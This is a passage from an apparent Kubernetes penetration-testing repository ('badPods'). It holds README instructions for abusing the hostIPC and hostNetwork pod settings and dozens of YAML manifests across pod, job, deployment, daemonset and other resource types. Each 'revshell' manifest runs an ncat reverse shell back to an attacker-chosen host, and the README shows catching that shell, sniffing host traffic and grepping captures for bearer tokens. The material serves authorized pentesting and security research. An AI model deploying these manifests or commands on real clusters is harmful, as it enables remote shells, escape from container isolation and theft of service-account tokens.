| 106 | Check out any interesting files 107 | ``` 108 | root@hostipc-exec-pod:/# cat /dev/shm/secretpassword.txt 109 | secretpassword=BishopFox 110 | ``` 111 | 112 | ## Look for any use of inter-process communication on the host 113 | ```bash 114 | ipcs -a 115 | ``` 116 | 117 | ## Attacks that apply to all pods, even without any special permissions 118 | 119 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 120 | 121 | * Access the cloud metadata service 122 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 123 | * Kubernetes exploits 124 | * Hunting for vulnerable application/services in the cluster 125 | 126 | # Demonstrate impact 127 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 128 | 129 | # References and further reading: 130 | * https://docs.docker.com/engine/reference/run/#ipc-settings---ipc 131 | * https://opensource.com/article/20/1/inter-process-communication-linux 132 | -------------------------------------------------------------------------------- /manifests/hostipc/cronjob/hostipc-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostipc-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostIPC: true 15 | containers: 16 | - name: hostipc-exec-cronjob 17 | image: ubuntu 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "while true; do sleep 30; done;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | 23 | -------------------------------------------------------------------------------- /manifests/hostipc/cronjob/hostipc-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | apiVersion: batch/v1beta1 8 | kind: CronJob 9 | metadata: 10 | name: hostipc-revshell-cronjob 11 | labels: 12 | app: pentest 13 | spec: 14 | schedule: "*/1 * * * *" 15 | concurrencyPolicy: Forbid 16 | jobTemplate: 17 | spec: 18 | template: 19 | spec: 20 | hostIPC: true 21 | containers: 22 | - name: hostipc-revshell-cronjob 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | restartPolicy: OnFailure 28 | 29 | -------------------------------------------------------------------------------- /manifests/hostipc/deamonset/hostipc-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostipc-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc-exec-daemonset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/deamonset/hostipc-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostipc-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: hostipc 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | 29 | -------------------------------------------------------------------------------- /manifests/hostipc/deployment/hostipc-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostipc-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostIPC: true 21 | containers: 22 | - name: hostipc-exec-deployment 23 | image: ubuntu 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostipc/deployment/hostipc-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostipc-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostIPC: true 21 | containers: 22 | - name: hostipc 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostipc/job/hostipc-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostipc-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostIPC: true 12 | containers: 13 | - name: hostipc-exec-job 14 | image: ubuntu 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "while true; do sleep 30; done;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | 20 | -------------------------------------------------------------------------------- /manifests/hostipc/job/hostipc-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostipc-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostIPC: true 12 | containers: 13 | - name: hostipc 14 | image: raesene/ncat 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | 20 | -------------------------------------------------------------------------------- /manifests/hostipc/pod/hostipc-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostipc-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostIPC: true 9 | containers: 10 | - name: hostipc-pod 11 | image: ubuntu 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "while true; do sleep 30; done;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | -------------------------------------------------------------------------------- /manifests/hostipc/pod/hostipc-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostipc-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostIPC: true 9 | containers: 10 | - name: hostipc 11 | image: raesene/ncat 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | -------------------------------------------------------------------------------- /manifests/hostipc/replicaset/hostipc-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostipc-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc-exec-replicaset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/replicaset/hostipc-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostipc-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/replicationcontroller/hostipc-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostipc-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc-exec-replicationcontroller 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/replicationcontroller/hostipc-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostipc-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/statefulset/hostipc-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostipc-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostipc-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostipc-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostIPC: true 36 | containers: 37 | - name: hostipc-exec-statefulset 38 | image: ubuntu 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "while true; do sleep 30; done;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | -------------------------------------------------------------------------------- /manifests/hostipc/statefulset/hostipc-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostipc-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostipc-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostipc-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostIPC: true 36 | containers: 37 | - name: hostipc 38 | image: raesene/ncat 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | 43 | -------------------------------------------------------------------------------- /manifests/hostnetwork/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #6: hostNetwork 2 | ![](../../.github/images/Pod6.jpg) 3 | 4 | If you only have `hostNetwork=true`, you can't get privileged code execution on the host directly, but if your cross your fingers you might still find a path to cluster admin. There are two potential escalation paths: 5 | * **Sniff traffic** - You can use `tcpdump` to sniff unencrypted traffic on any interface on the host. You might get lucky and find `service account` tokens or other sensitive information that is transmitted over unencrypted channels. 6 | * **Access services bound to localhost** - You can also reach services that only listen on the host’s loopback interface or that are otherwise blocked by network polices. These services might turn into a fruitful privilege escalation path. 7 | * **Bypass network policy** - If a restrictive network policy is applied to the namespace, deploying a pod with `hostNetwork=true` allows you to bypass the restrictions because you are bound to the host's network interfaces, and not the pod. 8 | ## Table of Contents 9 | - [Pod creation & access](#pod-creation--access) 10 | - [Exec pods](#exec-pods) 11 | - [Reverse shell pods](#reverse-shell-pods) 12 | - [Deleting resources](#deleting-resources) 13 | - [Post Exploitation](#post-exploitation) 14 | - [Install tcpdump and sniff traffic](#install-tcpdump-and-sniff-traffic) 15 | - [Investigate local services](#investigate-local-services) 16 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 17 | - [Demonstrate impact](#demonstrate-impact) 18 | - [References and further reading:](#references-and-further-reading) 19 | 20 | 21 | # Pod creation & access 22 | 23 | ## Exec pods 24 | Create one or more of these resource types and exec into the pod 25 | 26 | **Pod** 27 | ```bash 28 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 29 | kubectl exec -it hostnetwork-exec-pod -- bash 30 | ``` 31 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 32 | 33 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 34 | 35 | ```bash 36 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/[RESOURCE_TYPE]/hostnetwork-exec-[RESOURCE_TYPE].yaml 37 | kubectl get pods | grep hostnetwork-exec-[RESOURCE_TYPE] 38 | kubectl exec -it hostnetwork-exec-[RESOURCE_TYPE]-[ID] -- bash 39 | ``` 40 | 41 | *Keep in mind that if pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 42 | 43 | To troubleshoot a case where you don't see pods, use `kubectl describe` 44 | 45 | ``` 46 | kubectl describe hostnetwork-exec-[RESOURCE_TYPE] 47 | ``` 48 | 49 | ## Reverse shell pods 50 | Create one or more of these resources and catch the reverse shell 51 | 52 | **Step 1: Set up listener** 53 | ```bash 54 | ncat --ssl -vlp 3116 55 | ``` 56 | 57 | **Step 2: Create pod from local manifest without modifying it by using env variables and envsubst** 58 | 59 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 60 | * Replace the HOST and PORT values to point the reverse shell to your listener 61 | * 62 | ```bash 63 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostnetwork/[RESOURCE_TYPE]/hostnetwork-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 64 | ``` 65 | 66 | **Step 3: Catch the shell** 67 | ```bash 68 | $ ncat --ssl -vlp 3116 69 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 70 | Ncat: Listening on :::3116 71 | Ncat: Listening on 0.0.0.0:3116 72 | Connection received on 10.0.0.162 42035 73 | ``` 74 | 75 | ## Deleting resources 76 | You can delete a resource using it's manifest, or by name. Here are some examples: 77 | ``` 78 | kubectl delete [type] [resource-name] 79 | kubectl delete -f manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 80 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 81 | kubectl delete pod hostnetwork-exec-pod 82 | kubectl delete cronjob hostnetwork-exec-cronjob 83 | ``` 84 | 85 | 86 | # Post Exploitation 87 | 88 | ## Install tcpdump and sniff traffic 89 | *If you can't install tools to your pod (no internet access), you will have to change the image in your pod yaml to something that already includes `tcpdump`, like https://hub.docker.com/r/corfr/tcpdump* 90 | 91 | ```bash 92 | apt update && apt -y install tcpdump net-tools netcat 93 | ``` 94 | You now have a few options for next steps: 95 | 96 | **See if the `kubelet` read port (10255/tcp) is open on any of the node's IPs** 97 | ```bash 98 | nc -zv 10.0.0.162 10255 99 | Connection to 10.0.0.162 10255 port [tcp/*] succeeded! 100 | nc -zv 172.17.0.1 10255 101 | Connection to 172.17.0.1 10255 port [tcp/*] succeeded! 102 | ``` 103 | 104 | **If the read port is open, run `tcpdump`, recording the output to a file for a few minutes** 105 | 106 | **Warning:** Sniffing on an interface with a lot of traffic can cause the interface to DROP traffic, which is not what you want in an production environment. I suggest picking one port at a time for your packet captures (e.g., 10255, 80, 8080, 3000 25, 23) 107 | **Warning:** Always run `tcpdump` with the `-n` flag. This turns off name resolution, and if you don't, the name resolution will bring the capture, and potentially the host, to its knees. 108 | 109 | ```bash 110 | tcpdump -ni [host or docker interface name] -s0 -w kubelet-ro.cap port 10255 111 | ``` 112 | 113 | **Stop the capture and read the file with `tcpdump`. Tip: Use the `-A` flag to only show the printable characters and hunt for things like tokens with `grep`** 114 | 115 | ```bash 116 | tcpdump -ro kubelet-ro.cap -s0 -A 117 | tcpdump -ro kubelet-ro.cap -s0 -A | grep Bearer 118 | ``` 119 | 120 | Cross your fingers and look for secrets. If you are lucky, you might even get a jwt. If you are really lucky, that token might be associated with a service account in `kube-system`. 121 | 122 | 123 | ## Investigate local services 124 | ```bash 125 | curl https://localhost:1234/metrics 126 | ``` 127 | 128 | ## Attacks that apply to all pods, even without any special permissions 129 | * Cloud metadata service 130 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 131 | * Kubernetes exploits 132 | * Hunting for vulnerable application/services in the cluster 133 | 134 | # Demonstrate impact 135 | 136 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 137 | 138 | # References and further reading: 139 | -------------------------------------------------------------------------------- /manifests/hostnetwork/cronjob/hostnetwork-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostnetwork-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostNetwork: true 15 | containers: 16 | - name: hostnetwork-exec-cronjob 17 | image: ubuntu 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "while true; do sleep 30; done;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | 23 | -------------------------------------------------------------------------------- /manifests/hostnetwork/cronjob/hostnetwork-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostnetwork 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostNetwork: true 15 | containers: 16 | - name: hostnetwork 17 | image: raesene/ncat 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | -------------------------------------------------------------------------------- /manifests/hostnetwork/deamonset/hostnetwork-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostnetwork-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-exec-daemonset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/deamonset/hostnetwork-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostnetwork-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-revshell-daemonset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/deployment/hostnetwork-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostnetwork-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | containers: 22 | - name: hostnetwork-exec-deployment 23 | image: ubuntu 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostnetwork/deployment/hostnetwork-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostnetwork-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | containers: 22 | - name: hostnetwork-revshell-deployment 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostnetwork/job/hostnetwork-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostnetwork-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | containers: 13 | - name: hostnetwork-exec-job 14 | image: ubuntu 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "while true; do sleep 30; done;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- /manifests/hostnetwork/job/hostnetwork-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostnetwork-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | containers: 13 | - name: hostnetwork-revshell-job 14 | image: raesene/ncat 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- /manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostnetwork-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | containers: 10 | - name: hostnetwork-pod 11 | image: ubuntu 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "while true; do sleep 30; done;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | 16 | -------------------------------------------------------------------------------- /manifests/hostnetwork/pod/hostnetwork-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostnetwork-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | containers: 10 | - name: hostnetwork-pod 11 | image: raesene/ncat 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | 16 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicaset/hostnetwork-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostnetwork-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-exec-replicaset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicaset/hostnetwork-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostnetwork-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-revshell-replicaset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicationcontroller/hostnetwork-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostnetwork-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-exec-replicationcontroller 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/replicationcontroller/hostnetwork-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostnetwork-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | 